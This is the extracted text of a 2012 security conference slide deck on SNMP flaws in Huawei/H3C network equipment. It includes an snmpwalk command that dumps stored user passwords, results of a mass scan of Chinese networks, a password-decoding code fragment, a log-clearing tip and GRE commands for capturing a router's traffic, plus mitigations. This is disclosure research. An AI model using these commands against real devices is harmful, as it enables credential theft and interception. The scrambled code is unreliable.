3. Disclaimer
Any
content
or
opinion
stated
herein
is
that
of
myself
and
not
of
my
employer.
The
informaGon
is
being
provided
“as-‐is”
and
as
a
convenience,
for
informaGonal
purposes
only.
Any
resemblance
to
real
persons,
living
or
dead,
is
purely
coincidental.
No
warranty
is
expressed
or
implied.
Not
responsible
for
direct,
indirect,
incidental
or
consequenGal
damages
resulGng
from
any
defect,
error
or
failure
to
perform.
For
recreaGonal
use
only.
May
be
too
intense
for
some
viewers.
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
3
4. POLITICS!
This
presentaGon
does
not
care
about
the
poli%cs
between
China,
the
US
and
any
companies
Data
is
presented
to
show
the
pervasive
risk
these
new
vulnerabiliGes
create
China
was
only
used
because
they
have
the
largest
install
base
of
Huawei
and
H3C
equipment
available
via
the
Internet!
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
4
5. About
@grutz….
PenetraGon
tester
In
the
business
of
breaking
into
businesses
business
business
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
5
6. The
Huawei/H3C/HP
Timeline
Bain
Capital
/
Huawei-‐3Com
Huawei
/
HP
Acquires
Partnership
3Com
deal
H3C
2006
Sep
28,
2007
April
12,
2010
H3C
is
born!
US
Gov’t
US
Gov’t
Smackdown
Huawei/ZTE
May
7,
2007
2008
Smackdown
Oct
8,
2012
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
6
7. Huawei
!=
H3C
...except
when
they
are
(so`ware)
Since
the
creaGon
of
H3C
by
Huawei-‐3Com
the
two
companies
diverged
their
product
lines.
Yet
they
sGll
shared
a
very
similar
code
origin
(and
bugs!)
VulnerabiliGes
described
here
and
in
FX’s
talk
can
generally
affect
Huawei
devices
in
the
Huawei-‐3Com
years
(2006-‐2010)
and
all
H3C
devices
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
7
9. Huawei’s
July
31,
2012
Response
to
c|net
hfp://news.cnet.com/8301-‐1009_3-‐57482813-‐83/expert-‐huawei-‐routers-‐are-‐riddled-‐with-‐vulnerabiliGes/
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
9
10. LETS
TALK
BIG
BANG
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
10
11. Overflows
are
cool…
…but
they’re
finicky
lifle
beasts
Huawei/H3C
not
as
bad
as
Cisco
IOS
but,
sGll..
How
many
Gmes
have
you
used
an
IOS
buffer
overflow?
No,
really…
Be
serious
here!
Now
how
many
Gmes
have
you
used
SNMP
to
download
device
configs?
Which
would
you
rely
upon
for
network
penetraGon?
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
11
12. h3c
(old)
vs
hh3c
(new)
For a node in the H3C new-style MIB files, its name
starts with hh3c, and its OID starts with
1.3.6.1.4.1.25506; for a node in the H3C compatible-
style MIB files, its name starts with h3c, and its
OID starts with 1.3.6.1.4.1.2011.10.
For example, node hh3cCfgOperateType with the OID of
1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-
config-man.mib, and node h3cCfgOperateType with the
OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file
h3c-config-man.mib. Both of the two nodes indicate
the same variable in the agent, but they are in
different MIB style.
By default, devices use H3C new-style MIB files;
http://www.h3c.com/portal/Products___Solutions/Technology/
System_Management/Configuration_Example/
200912/656452_57_0.htm#_Toc247357228
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
12
14. hh3c-‐config-‐man
caveats
Support
it
spofy
between
device
types
Mostly
routers
and
switches
work
H3C
ERxxxx
Series:
OpType
=
1
(system2net)
Downloads
are
logged
Requires
Read/Write
community
string
Buggy!
Manual
“snmpset”
worked
some
of
the
Gme
Metasploit
module
worked
some
of
the
Gme
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
14
20. What
is
MAX-‐ACCESS
and
read-‐create?
RFC-‐1902:
SMI
for
SNMPv2
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
20
21. …so
it’s
protected,
right?
Sure
it
is!
Unless
you
know
the
SNMP
READ
ONLY
string…
This
was
probably
a
bug…
or
a
misunderstanding…
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
21
22. Lets
glob
some
users!
$
snmpwalk
–c
public
–v
1
<host>
1.3.6.1.4.1.2011.10.2.12.1.1.1
Walks
the
locally
defined
list
of
users:
local user <username>
password <clear|cipher|sha256> <value>
level [0|1|2|3]
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
22
25. Strap
In
and
Let’s
Scan
China!
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
25
26. INCONCEIVABLE!
hfp://www.okean.com/chinacidr.txt
2,444
netblocks
290,118,656
hosts
Only
care
about
SNMP
Onesixtyone
to
the
rescue!
Originally
by
Solar
Eclipse
Updated
in
2011
by
Paul
Flo
Williams:
hfps://github.com/hisdeedsaredust/onesixtyone
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
26
27. L33t
b@$h
sk1ddy
For
best
results
use
a
VPS/host
from
a
country
China
trusts
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
27
29. China
Network
Device
Counts
(Oct
2012)
140,000
120,000
Huawei
/
H3C,
117,033
100,000
Huawei
/
H3C,
88,517
80,000
ZTE,
64,579
SNMP
R/O
60,000
SNMP
R/W
40,000
ZTE,
33,669
20,000
Cisco,
11,278
vxWorks,
8,121
0
Cisco,
2,475
Juniper,
273
99
-‐20,000
Source:
Personal
scan
of
China
Netblock
ranges
using
SNMP
strings
“public”,
“private”,
“h3c”,
“china”
and
“telecom”
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
29
30. Compare
H3C
results
from
ShodanHQ
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
30
31. (h)h3c-‐user
Results
Devices
with
locally
defined
accounts:
15,588
Devices
with
ciphered
passwords:
5,132
Devices
with
cleartext
passwords:
15,263
Total
accounts/passwords:
33,938
Unique
passwords:
3,898
Username
==
Password:
2,101
Unique
version
strings:
686
A
majority
of
cleartext-‐only
passwords
were
from
one
Telecom
company.
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
31
32. What
Type
of
Accounts
are
these?
Local
users
can
be
used
for:
Remote
management
access
(telnet,
ssh,
web)
VPN
access
In
most
cases
telnet,
ssh
and
hfp
were
open
on
devices
with
locally
defined
accounts.
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
32
34. SO
ABOUT
THAT
CIPHER…
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
34
35. Huawei/H3C
Not
Unique
In
This
Weak
and
reversible
ciphers
seem
to
be
a
standard
for
all
Networking
companies
at
one
Gme:
Cisco
Type
7
Vinegere
cipher
Juniper
$9$
Generally
these
are
used
because
some
protocols
need
to
use
cleartext
passwords
yet
these
should
not
be
stored
in
the
clear.
So….why
not
ROT13?
Just
as
secure…….
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
35
37. Want
more
examples?
jfgi!
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
37
38. This
means
something…
Ciphers
are
24
or
88
chars
in
length
‘!!’
at
the
end
of
everything
Base64
rotaGonal?
Good
idea,
but
no…
didn’t
pan
out.
Consistent
last
few
bytes
of
data:
Q=^Q`MAF4<1!!
Consistent
first
10
bytes
(2P;JH_C3’+)
when
the
cleartext
is
=>
8
characters
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
38
39. Probably
using
a
block-‐based
cipher
IdenGcal
plaintext
blocks
encrypt
to
idenGcal
cipher
blocks:
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
39
40. Binary/ASCII
Encoding
Let’s
assume
DES-‐EBC:
Probably
a
staGc
key
Input
=
cleartext
+
null
padding
Output
=
binary
data
Binary
result
converted
to
printable
ASCII
ASCII
NOT
Base64
but
similar
(4
chars
to
3
bytes)
A
consistent
cipher
string
length
based
on
source
length
means
we’re
probably
correct.
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
40
41. Lets
decode
to
binary!
result
=
bytearray()
cv1
=
ord(cipher[cipher_loc])
if
cv1
!=
chkval:
chkval
=
ord('a')
cv2
=
cv2
<<
6
cipher_loc
=
0
else:
cv1
=
ord('?')
#
converter
works
in
groups
of
4
until
#
cipherlen
is
reached
#
group
4
for
cnt
in
range(0,
cipherlen,
4):
cv1
=
cv1-‐33
#
group
1
cv2
=
cv2
|
cv1
cv1
=
ord(cipher[cipher_loc])
cipher_loc
+=
1
if
cv1
==
chkval:
cv1
=
ord(cipher[cipher_loc])
cv1
=
ord('?')
if
cv1
!=
chkval:
cv2
=
cv2
<<
6
#
group
2
else:
cv2
=
cv1-‐33
cv1
=
ord('?')
cipher_loc
+=
1
cv1
=
ord(cipher[cipher_loc])
#
output
if
cv1
!=
chkval:
cv1
=
cv1-‐33
cv2
=
cv2
<<
6
cv2
=
cv2
|
cv1
else:
cipher_loc
+=
1
cv1
=
ord('?')
#
group
3
result.append((cv2
&
0xff0000)
>>
16)
cv1
=
cv1-‐33
result.append((cv2
&
0xff00)
>>
8)
cv2
=
cv2
|
cv1
result.append(cv2
&
0xff)
cipher_loc
+=
1
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
41
42. Huawei’s
Soluaon
Use
AES-‐256
and
updated
so`ware
for
SNMP
Yes..
AES-‐256..
A
symmetric
cipher.
hfp://support.huawei.com/enterprise/
ReadLatestNewsAcGon.acGon?
contentId=NEWS1000001141
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
42
43. HP/H3C’s
Soluaon
Use
SHA-‐256
on
those
systems
that
support
it
Upgrade
your
code
for
the
SNMP
fix.
hfps://h20566.www2.hp.com/portal/site/hpsc/public/
kb/docDisplay/?docId=emr_na-‐c03515685
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
43
44. So
about
this
SHA-‐256…
Yeah,
salted
SHA-‐256.
Not
reversible
but
crackable!
h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5
pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
44
45. NOW
WHAT?
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
45
46. Things
to
watch
out
for
All
commands
are
logged
locally
>
reset
logbuffer
Keyboard
keys
are
very
annoying
Backspace
is
not
backspace,
unless
it’s
^H
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
46
47. See
All
Packets!!!
<rtr1> system-view
[rtr-1] interface tunnel 1/0/1
[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
[rtr-1-Tunnel1/0/1] tunnel-protocol gre
[rtr-1-Tunnel1/0/1] source 10.10.1.1
[rtr-1-Tunnel1/0/1] destination 192.168.1.1
[rtr-1-Tunnel1/0/1] quit
[rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1
linux# modprobe ip_gre
linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local
192.168.1.1 ttl 255
linux# ip link set gre0 up
Linux# ip addr add 10.10.10.2/24 dev gre0
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
47
49. Be
protected..
Be
be
protected!
Don't
configure
local
accounts,
use
RADIUS
or
TACACS+
Don't
configure
SNMPv1
Don't
use
default
SNMP
strings
Disable
the
snmp
view
for
(h)h3c-‐user:
snmp-‐agent
mib-‐view
excluded
1.3.6.1.4.1.2011.10.2.12.1.1.1
snmp-‐agent
mib-‐view
excluded
1.3.6.1.4.1.25506.2.12.1.1.1
Use
SHA256
passwords
if
your
image
supports
it
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
49
50. hfp://github.com/grutz/h3c-‐pt-‐tools/
hfp://grutztopia.jingojango.net/
Thanks
to
#metasploit,
hdm,
FX,
eMaze
(Ivan
and
Roberto),
HP/H3C
and
Huawei
IRTs,
US-‐
CERT
and
others
whom
I
may
have
forgofen
QUESTIONS?
BayThreat
2012
-‐-‐
@grutz
A
CouNtry’s
Honorable
n3twork
deviCes
50